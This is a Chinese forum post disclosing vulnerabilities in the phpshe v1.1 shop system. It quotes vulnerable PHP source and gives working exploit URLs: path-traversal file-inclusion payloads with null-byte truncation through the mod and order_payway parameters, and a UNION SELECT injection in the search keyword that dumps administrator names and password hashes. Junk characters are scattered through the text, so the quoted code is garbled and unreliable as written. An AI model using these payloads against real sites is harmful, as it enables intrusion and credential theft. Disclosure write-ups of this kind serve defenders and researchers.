找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2196|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
0 d) j1 v  k# N) M! A+ F/* Phpshe v1.1 Vulnerability
# q0 `8 R4 r! _  K) W/* ========================5 C) X" T! o& A
/* By: : Kn1f3+ G  G# T7 P1 k: z! I& |
/* E-Mail : 681796@qq.com' D; T# D2 [. i6 S8 e$ r
/*******************************************************/
& A$ G/ k* T; F( F0×00 整体大概参数传输
$ q5 E$ U, I! k8 i - s2 i1 B6 m; q% D7 D, f3 X
2 o- ~! v( }1 I9 u" _
+ y* R) r4 ~* T; {8 T% W- U' c5 @
//common.php1 u2 l8 G5 O% `6 v
if (get_magic_quotes_gpc()) {% Y- S$ j: b5 B# `$ X' g
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
+ v6 e/ w' ^- g  L!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');& M- d6 c; k3 v0 _/ r' m
}' R8 r5 c1 Z9 Y0 a4 J
else {
& h/ @8 P. g* m% s$ k2 Q!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');/ V! }& C# E; H+ t
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');6 w: y6 P# @9 M; g, z1 U5 ?
}: k: R0 K% e/ d2 X5 q& `
session_start();! [2 u* [! O# ^, `% G
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
* p# p4 `( A, Z3 Y4 ^* ]. O- n2 C!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
6 M7 A& R- G2 E; Y& j6 E( Y% y0 Z% k- ^- }; B3 r( r  i8 e
0×01 包含漏洞' N* J* r$ x/ M3 U
( i: g  \) k5 a% j- y( S) O( a

. h; N& I, ?* m9 s//首页文件1 B& h6 M+ u9 g+ Z
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
$ D! w/ B& p- _( `. Z) vinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
8 f. V: a7 c: p% u9 b- Jpe_result();
+ ?# b; h/ N6 \* Z3 U0 g0 i$ W% Z% R. c?>8 A! X7 {" H/ @: P4 g- v; e' M
//common 文件 第15行开始
6 m) V- U& @+ {6 J5 o! Kurl路由配置" O( _  q& [' A  |
$module = $mod = $act = 'index';
! C1 E' z# Y, U6 h/ B  S! p2 f$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);  {- C7 B# J, B' k& r% g
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
. t- I7 F! N% p$ h* N$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
8 P" @" P" s7 X* |//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%000 G0 A! ?% R& I8 o$ \8 S- W' v0 U

7 [: q( f* \- n
  N' @' o% S  G# Z, D! W+ m2 f
0×02 搜索注入
2 ?9 K; v+ C! v0 Y3 J" _  _, V5 ~
7 U7 S! O  r: g4 W1 O+ c: Y<code id="code2">

//product.php文件
; y5 @  x* U# ?$ Pcase 'list':" B3 R: [3 N4 O1 X4 ^
$category_id = intval($id);/ M- j1 D5 g& Z1 ~7 Q5 }6 q+ M8 k
$info = $db->pe_select('category', array('category_id'=>$category_id));6 ?: n. P* R7 v# H2 _
//搜索
! t+ k. A# m. Y8 a$sqlwhere = " and `product_state` = 1";: X9 _6 E2 {* ^9 o  W& a3 f
pe_lead('hook/category.hook.php');9 f, T8 k1 t/ J- E
if ($category_id) {
3 T2 T; ~' m0 J! pwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
# M$ ]; g9 S, m$ @}
2 z# A7 u  e6 Y( ]7 V1 I$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤, E- d5 A" L/ N# q) z1 G
if ($_g_orderby) {
( o( z0 f: z0 f$orderby = explode('_', $_g_orderby);3 {' P& C/ R/ x( U- G- h% L/ ^% R, d# r
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";; `* H! l0 t( m9 i9 [' S4 C$ e
}
6 f& N( b4 O! W! ~( K2 Qelse {
) [5 R7 D" s0 y+ l4 z$sqlwhere .= " order by `product_id` desc";
5 u1 B$ K5 F+ t( x6 ?0 C8 Q/ @}& c2 w* ]! s6 h# H
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));1 B' a( k8 Q  q$ S' o* }% H
//热卖排行
" h( G) y, `+ L$ H$product_hotlist = product_hotlist();1 Z% C* j$ g4 u
//当前路径
- Z+ f& a/ L" r5 t9 O" N6 ]3 F$nowpath = category_path($category_id);0 P; o( j/ ?$ J" v  J% \
$seo = pe_seo($info['category_name']);
% s! s& I  H& {$ [- j: Dinclude(pe_tpl('product_list.html'));; D* V5 n3 T2 ]& d
//跟进selectall函数库3 ^, B) d+ B9 E. d! E9 E) H- r
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
5 Q5 t/ ?5 j  M& N* N  r{+ [# G, \$ T$ k* [! V2 a
//处理条件语句4 J) c/ i4 R  W) ~0 z2 s
$sqlwhere = $this->_dowhere($where);
4 J$ ^% T6 s5 o4 g% l+ V/ Ireturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
% n0 q; j6 e: R9 H}% Z6 k: v7 T6 o# r( n2 |/ }/ u
//exp% y2 J/ R# M0 @% C" x
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1; N. c8 |) x! e! v

</code>2 `! p9 D2 |: `! \
/ I" |/ m. _+ W6 @5 S
0×03 包含漏洞27 v  [9 v9 u9 O5 }% m  }

6 S9 ?; X( ~( k5 C* {4 ]0 ?<code id="code3">

//order.php

case 'pay':

: k7 A/ ?: S* d" Q6 X4 P5 A
$order_id = pe_dbhold($_g_id);


& `& T7 v/ N' X9 D, K$ X( h! v$cache_payway = cache::get('payway');

5 t* F* j* r- b# v) H
foreach($cache_payway as $k => $v) {


  s" A* E, M  B9 S0 o$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


* N( X, o0 o. sif ($k == 'bank') {

! w5 y$ u% V4 \. {# j4 ?0 A# A% s
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


' ~( _+ e3 f$ n/ l7 u}


) s6 |( r* J0 j! Q) a; y- ?) l}

( r' e0 m7 K$ u* `% W
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


  q* ~$ y) V$ o!$order['order_id'] && pe_error('订单号错误...');


) u+ G- k* b1 s7 Cif (isset($_p_pesubmit)) {


* ?6 j* x3 C& z6 ]if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

& }- n3 h: Q1 Z1 v) G
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

9 ?) c' }/ @: ^0 R* y
foreach ($info_list as $v) {

; N* K6 [1 x4 m* X
$order['order_name'] .= "{$v['product_name']};";
  [) ?  }$ E$ n. R7 m% W, M

3 D, N, r* g9 ]) U) ~) [
}

* b' D, n& y0 ]
echo '正在为您连接支付网站,请稍后...';

$ k4 D( [4 X' [: N* O( k
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


4 ?2 Z! J3 r' R2 \1 m0 @}//当一切准备好的时候就可以进行"鸡肋包含了"


6 D8 L  Q9 q3 h8 g: _. felse {


8 j( B& A! G- k4 hpe_error('支付错误...');


- v! ]2 |, j( s3 C+ Q}

* R6 I: n% z4 M2 ~4 L6 p
}


2 Z+ N9 H1 Q6 `* k9 w$seo = pe_seo('选择支付方式');

  ]# A  H7 W' H  k: p
include(pe_tpl('order_pay.html'));

( q1 k# y, ^7 [8 G: c6 y5 K' }" K' g
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
2 S( i# S: d' s, xhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表